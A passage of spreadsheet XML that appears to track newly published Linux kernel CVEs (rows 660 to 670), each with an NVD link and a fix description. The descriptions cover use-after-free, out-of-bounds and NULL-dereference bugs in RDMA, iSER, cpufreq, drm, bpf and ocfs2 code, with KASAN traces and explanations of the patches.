        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90292</t>
        </is>
      </c>
      <c r="D660" s="5" t="inlineStr"/>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="inlineStr"/>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr"/>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/siw: Fix use-after-free in siw_accept()
siw_accept() looks up the QP supplied by userspace. If that QP is
already in RTS, the function jumps to error cleanup before associating
the incoming CEP with it.
The cleanup tests whether qp-&gt;cep is non-NULL and assumes the current
call installed the association. However, qp-&gt;cep can point to the CEP
of an existing connection. The cleanup then drops a reference from the
incoming cep, not qp-&gt;cep. Once the incoming endpoint loses its
remaining references, this can free it before the subsequent cep-&gt;qp
store, causing a use-after-free. It also clears the existing QP
association.
Only release the association reference when qp-&gt;cep is the incoming
CEP. This preserves an existing association and avoids accessing the
freed endpoint.</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90292</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90293</t>
        </is>
      </c>
      <c r="D661" s="5" t="inlineStr"/>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="inlineStr"/>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr"/>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: post the full-feature receive buffers after session registration
isert_put_login_tx() posts the full-feature receive buffers before
__transport_register_session() runs, so an initiator that does not wait
for the final Login Response can still have a SCSI command executed
against an se_session whose se_tpg is NULL - the same oops as the
previous patch, at target_submit+0xbe.
Post them from isert_get_rx_pdu(), which the previous patch already uses
to send that response, and post them before that send: the receive queue
is filled at the moment the initiator is told it may use it.  Allocating
there keeps the existing property that a memory allocation failure cannot
happen once the final Login Response is on the wire.
The receive queue is already empty between the final Login Request and
isert_post_recvm(); this moves the second point later, from a median of
92 us to 172 us over 1200 logins.  Only an initiator that sends before it
has been told to can reach that window, and on IB and RoCE its send is
retried there until the buffers appear - isert_rdma_accept() asks for
rnr_retry_count = 7.  iWARP has no RNR flow control, so there the same
send terminates the connection instead.
Measured over rxe, 400 login cycles per run, with an initiator that does
not wait: an instrumented build counted no entries to isert_recv_done()
before the buffers are posted in 10 runs, where that initiator oopsed
8 of 10 unpatched runs and 5 of 10 with only the previous patch.
Not tested: iWARP, discovery sessions over iSER, and real HCAs.</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90293</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90294</t>
        </is>
      </c>
      <c r="D662" s="5" t="inlineStr"/>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="inlineStr"/>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr"/>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: delay the final Login Response until the session is registered
isert_put_login_tx() puts the final Login Response on the wire before
__transport_register_session(), which iscsi_post_login_handler() reaches
only after iscsi_target_do_login() returns.  An initiator that issues a
SCSI command as soon as it sees that response can have it executed against
an se_session whose se_tpg is still NULL, and the ib-comp-wq worker oopses
on the NULL dereference.
 Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI
 KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]
 CPU: 0 UID: 0 PID: 178 Comm: kworker/0:1H Not tainted 7.2.0-rc5-V2CTL-gf5098b6bae76 #10 PREEMPT(lazy)
 Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
 Workqueue: ib-comp-wq ib_cq_poll_work
 RIP: 0010:target_submit+0xbe/0x390
 Code: fa 48 c1 ea 03 80 3c 02 00 0f 85 89 02 00 00 48 b8 00 00 00 00 00 fc ff df 4d 8b 64 24 18 49 8d 7c 24 78 48 89 fa 48 c1 ea 03 &lt;80&gt; 3c 02 00 0f 85 5a 02 00 00 48 8d 7b 78 4d 8b 6c 24 78 48 b8 00
 RSP: 0018:ffff8881058cfa78 EFLAGS: 00010206
 RAX: dffffc0000000000 RBX: ffff88810c78c6f0 RCX: ffffffff964bb363
 RDX: 000000000000000f RSI: 00000000fffffe00 RDI: 0000000000000078
 RBP: 1ffff11020b19f52 R08: 0000000000000001 R09: ffffed1020b19f52
 R10: 0000000000000003 R11: ffff88810596c000 R12: 0000000000000000
 R13: ffff88810c61b000 R14: ffff88810c6a3400 R15: ffff88810c61b044
 FS:  0000000000000000(0000) GS:ffff8881822b2000(0000) knlGS:0000000000000000
 CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 CR2: 00007f1f1b83c000 CR3: 000000006fe72001 CR4: 0000000000770ef0
 PKRU: 55555554
 Call Trace:
  &lt;TASK&gt;
  ? __pfx__raw_spin_lock_bh+0x10/0x10
  ? __pfx_target_submit+0x10/0x10
  ? mutex_lock+0x81/0xe0
  ? __pfx_mutex_lock+0x10/0x10
  ? iscsit_execute_cmd+0x650/0x850
  iscsit_sequence_cmd+0x186/0x3d0
  iscsit_process_scsi_cmd+0x87/0x300
  isert_recv_done+0x1002/0x2390
  ? __pfx_isert_recv_done+0x10/0x10
  ? rxe_poll_cq+0x253/0x3d0
  ? finish_task_switch.isra.0+0x1dc/0xa70
  __ib_process_cq+0xe1/0x390
  ib_cq_poll_work+0x46/0x150
  process_one_work+0x633/0x1030
  ? assign_work+0x11d/0x370
  worker_thread+0x45b/0xd10
  ? __pfx_worker_thread+0x10/0x10
  ? __pfx_worker_thread+0x10/0x10
  kthread+0x2c6/0x3b0
  ? recalc_sigpending+0x15c/0x1e0
  ? __pfx_kthread+0x10/0x10
  ret_from_fork+0x36e/0x5a0
  ? __pfx_ret_from_fork+0x10/0x10
  ? __switch_to+0x572/0xdd0
  ? __pfx_kthread+0x10/0x10
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
 Modules linked in:
 ---[ end trace 0000000000000000 ]---
Delay the final Login Response instead.  isert_get_rx_pdu() runs from
iscsi_target_rx_thread() after conn-&gt;rx_login_comp, completed by
iscsi_post_login_handler() after __transport_register_session(); iscsi-TCP
and cxgbit already take PDUs from that thread, isert alone does not.  The
buffers are still posted first, so the initiator's first command does not
meet an empty receive queue and nothing depends on RNR flow control, and
the header and payload live in isert_conn, not in the struct iscsi_login
that iscsi_target_nego_release() frees first.
Over rxe, 400 login cycles per run, the oops appeared in 10 of 20
unpatched runs and in none of 20 runs with this patch.  An
initiator that never waits is handled by the next patch.
Not tested: iWARP, discovery sessions over iSER, and real HCAs.</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90294</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90295</t>
        </is>
      </c>
      <c r="D663" s="5" t="inlineStr"/>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="inlineStr"/>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr"/>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: imx6q: fix out-of-bounds write when probed more than once
imx6_soc_volt is allocated fresh on every probe, sized to the number of
ARM OPPs:
	imx6_soc_volt = devm_kcalloc(cpu_dev, num, sizeof(*imx6_soc_volt),
				     GFP_KERNEL);
but it is filled through soc_opp_count, which has static storage and is
never reset. A second bind after an unbind keeps indexing from where the
first one stopped, and writes past the end of the new array.
Unbinding and rebinding the driver on qemu's mcimx6ul-evk, under KASAN:
  BUG: KASAN: slab-out-of-bounds in imx6q_cpufreq_probe+0x3b0/0xa34
  Write of size 4 at addr c5e90480 by task binder/73
   imx6q_cpufreq_probe from platform_probe+0x88/0xe4
   platform_probe from really_probe+0x108/0x384
   bind_store from kernfs_fop_write_iter+0x1b4/0x28c
The write lands one u32 past the end of the allocation.
soc_opp_count is only read a few lines below the loop that fills it, so it
never needed static storage. Make it a local.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90295</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90296</t>
        </is>
      </c>
      <c r="D664" s="5" t="inlineStr"/>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="inlineStr"/>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr"/>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: imx6q: fix devres accumulation across driver rebind
imx6_soc_volt is allocated with devm_kcalloc(cpu_dev, ...), where cpu_dev
is the CPU device from get_cpu_device(0). That device is never unbound, so
its devres list is never released, and imx6q_cpufreq_remove() does not free
the array either. Every probe therefore adds an allocation that stays for
the lifetime of the system.
Allocate against the platform device instead. Its devres is released when
the driver is unbound, which is exactly the lifetime the array wants:
imx6q_set_target() reads it, and nothing may reach that after
cpufreq_unregister_driver().
That makes the array actually go away on unbind, so also clear the
file-scope pointer in remove and on the failed-probe path, rather than
leave it pointing at memory devres is about to release.
Tested by rebinding the driver on qemu's mcimx6ul-evk.</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90296</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90297</t>
        </is>
      </c>
      <c r="D665" s="5" t="inlineStr"/>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="inlineStr"/>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr"/>
      <c r="S665" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/sun4i: crtc: Propagate layer initialization error
sun4i_crtc_init() returns plain NULL when layer initialization fails,
while all its other error paths return an error pointer. The only
caller, sun4i_tcon_bind(), checks the result with IS_ERR() and happily
continues with tcon-&gt;crtc set to NULL. sun4i_rgb_init() and
sun4i_lvds_init() then dereference it in drm_crtc_mask(), which
oopses.
Return the error pointer instead.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90297</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90298</t>
        </is>
      </c>
      <c r="D666" s="5" t="inlineStr"/>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="inlineStr"/>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr"/>
      <c r="S666" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/sun4i: tcon: Drop TCON TOP device reference
of_find_device_by_node() takes a device reference. Drop it after mux
configuration succeeds.</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90298</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90299</t>
        </is>
      </c>
      <c r="D667" s="5" t="inlineStr"/>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="inlineStr"/>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr"/>
      <c r="S667" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix sleepable check for tracing/lsm prog
When CONFIG_FUNCTION_ERROR_INJECTION is disabled, a sleepable tracing prog
is allowed to attach to '__x64_'-alike prefix symbols.
It is because the verifier does not verify whether the symbol is a kernel
function or a bpf prog. That said, a sleepable tracing prog is allowed to
attach to a bpf prog target whose name has '__x64_'-alike prefix.
For example, a sleepable fentry prog attaches to a '__x64_sys_nop' XDP
prog, and copies buffer from a user pointer with bpf_copy_from_user()
helper. After attaching the XDP prog to lo interface, the kernel BUG
could be triggered by 'ping -c 1 -W 1 127.0.0.1':
[    3.460756] BUG: sleeping function called from invalid context at kernel/bpf/trampoline.c:1324
Fix it by disallowing sleepable prog always when its target
btf is not a kernel's btf.</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90299</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90300</t>
        </is>
      </c>
      <c r="D668" s="5" t="inlineStr"/>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="inlineStr"/>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr"/>
      <c r="S668" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Clear buf on error in __bpf_get_task_stack
Both bpf_get_task_stack and bpf_get_task_stack_sleepable helpers that
use __bpf_get_task_stack have buf defined as ARG_PTR_TO_UNINIT_MEM
argument and we should initialize the buf on every return path.
Adding missing buf memset for __bpf_get_task_stack fail paths. This
provides deterministic buffer contents, which is useful when the buffer
is used directly as a map key.</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90300</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90301</t>
        </is>
      </c>
      <c r="D669" s="5" t="inlineStr"/>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="inlineStr"/>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr"/>
      <c r="S669" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: o2hb: quiesce negotiate handlers and timeout work
Heartbeat regions publish struct o2hb_region as the private data for the
NEGO_TIMEOUT and NEGO_APPROVE o2net handlers as soon as make_item()
creates the configfs region.  The approve handler can call
o2hb_arm_timeout(), so a peer can touch the region timeout work before
dev_store() has finished building the heartbeat runtime, or after teardown
has started to shut that runtime back down.
The final configfs put also has to keep reg alive until the last in-flight
o2net callback drops its handler reference. 
o2net_unregister_handler_list() blocks future handler lookups, but it does
not wait for sc_rx_work that already passed o2net_handler_get().  That
drain needs to cover local listener teardown as well, where the o2net
ordered workqueue may already be inside destroy_workqueue().
Fix the lifetime rule in both directions.  Initialize the region delayed
works before publishing reg through the o2net handler table, keep new or
stopping regions non-armable with hr_stopping, and quiesce both delayed
works on failed-start and teardown paths even when no heartbeat thread is
left to call o2hb_disarm_timeout().  Then unregister handlers before
tearing down handler-visible region state and make the drain wait for the
active or destroying o2net ordered workqueue before release frees reg.
The buggy scenario involves two paths, with each column showing the order
within that path:
region lifecycle:                late negotiate callback:
1. make_item() registers the     1. o2net_process_message() gets a
   region handlers before           heartbeat handler for reg.
   dev_store() has built a       2. The callback runs after the lookup
   runnable heartbeat context.      lock is dropped and dereferences reg.
2. A failed start or rmdir       3. An approve or timeout path tries to
   stops the heartbeat thread,      queue reg's delayed work, or release
   quiesces existing work, and      races the callback body after handler
   drops the final configfs ref.    unregister.
3. region_release() must drain   4. The callback or delayed work can
   handler-visible o2net rx work    outlive reg unless lifecycle code
   before freeing reg.              keeps the region non-armable and
                                    drains the active-or-destroying
                                    o2net workqueue.
Validation reproduced this kernel report:
KASAN slab-use-after-free in __run_timers+0x22c/0x5b0
Write of size 8
Call trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  __run_timers+0x22c/0x5b0
  kasan_report+0xe0/0x110
  _raw_spin_unlock_irqrestore+0x27/0x60
  try_to_wake_up+0x191/0xf70
  timer_expire_remote+0xae/0xf0
  run_timer_softirq+0x19b/0x1a0
  handle_softirqs+0x156/0x660
  __irq_exit_rcu+0xc4/0x160
  irq_exit_rcu+0xe/0x20
  sysvec_apic_timer_interrupt+0x6c/0x80
  asm_sysvec_apic_timer_interrupt+0x1a/0x20
Allocated by task stack:
  kasan_save_stack+0x33/0x60
  kasan_save_track+0x14/0x30
  __kasan_kmalloc+0xaa/0xb0
  o2hb_heartbeat_group_make_item+0x3c/0x600</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90301</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90302</t>
        </is>
      </c>
      <c r="D670" s="5" t="inlineStr"/>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="inlineStr"/>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr"/>
      <c r="S670" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: synchronize heartbeat callbacks with o2net teardown
Patch series "ocfs2: harden heartbeat teardown races".
This series fixes two OCFS2 heartbeat/o2net teardown races found by
KASAN.
This patch (of 2):
Heartbeat callbacks stay registered while configfs local-node teardown
enters o2net_stop_listening().  A node-down event can still run through
o2net_disconnect_node() and o2net_set_nn_state() while teardown is
destroying o2net_wq, so the later queue/flush operations can hit a dead
workqueue.  KASAN has caught this as a slab-use-after-free in
__queue_work() with the call chain:
KASAN slab-use-after-free in __queue_work+0x56/0xa90
Read of size 4
Call trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  __queue_work+0x56/0xa90
  srso_alias_return_thunk+0x5/0xfbef5
  __virt_addr_valid+0x19f/0x330
  kasan_report+0xe0/0x110
  __queue_delayed_work+0x58/0x1e0
  queue_delayed_work_on+0xb4/0xc0
  o2net_set_nn_state+0x467/0x840
  o2net_disconnect_node+0x7b/0xe0
  o2net_hb_node_down_cb+0x54/0x60
  o2hb_run_event_list+0x236/0x2d0
  o2hb_check_slot+0xad4/0xbc0
  lock_release+0xc8/0x290
  o2hb_check_slot+0x9ea/0xbc0
  trace_hardirqs_on+0x18/0x130
  o2hb_do_disk_heartbeat+0x646/0xb30 (fs/ocfs2/cluster/heartbeat.c:1079)
  __lock_acquire+0x466/0x2260
  lockdep_hardirqs_on_prepare+0xea/0x1a0
  ktime_get_with_offset+0xe9/0x230
  o2hb_thread+0x14e/0x770
  kthread+0x1ad/0x1f0
  ret_from_fork+0x3c9/0x540
  __switch_to+0x2e9/0x730
  ret_from_fork_asm+0x1a/0x30
Allocated by task stack:
  kasan_save_stack+0x33/0x60
  kasan_save_track+0x14/0x30
  __kasan_kmalloc+0xaa/0xb0
  __kmalloc_noprof+0x292/0x760
  __alloc_workqueue+0x736/0xc60
  alloc_workqueue_noprof+0xb1/0x110
  o2net_start_listening+0xe5/0x430
  o2nm_node_local_store+0x184/0x310
  configfs_write_iter+0x18a/0x210
  vfs_write+0x469/0x810
  ksys_write+0xd2/0x170
  do_syscall_64+0x115/0x6a0 (arch/x86/entry/syscall_64.c:87)
  entry_SYSCALL_64_after_hwframe+0x77/0x7f
Freed by task stack:
  kasan_save_stack+0x33/0x60
  kasan_save_track+0x14/0x30
  kasan_save_free_info+0x3b/0x60
  __kasan_slab_free+0x5f/0x80
  kfree+0x313/0x590
  rcu_core+0x4f4/0x1320
  handle_softirqs+0x156/0x660
queue_delayed_work_on
o2net_set_nn_state
o2net_disconnect_node
o2net_hb_node_down_cb
o2hb_run_event_list
Keep heartbeat callbacks registered so quorum state still tracks node
state, but stop them from driving o2net reconnect/disconnect work once
local teardown starts. Mark the transport offline before destroying
o2net_wq, wait for any in-flight heartbeat callback to finish, and delay
bring-up replay until the new local node is published through
o2nm_this_node().
The replay also has to stay serialized with heartbeat callback delivery.
Otherwise a live-node snapshot can be copied, a real hb_down callback
can install -ENOTCONN for a peer, and the stale replay can call
o2net_hb_node_up() for that same peer and queue reconnect work even
though heartbeat is already down.
The buggy scenario involves two paths, with each column showing the order
within that path:
local-node teardown:                 heartbeat node-down callback:
1. configfs local-off enters         1. o2hb_run_event_list() invokes
   o2net_stop_listening().              o2net_hb_node_down_cb().
2. teardown heads for                2. the callback reaches
   destroy_workqueue(o2net_wq).         o2net_disconnect_node() and
                                        o2net_set_nn_state().
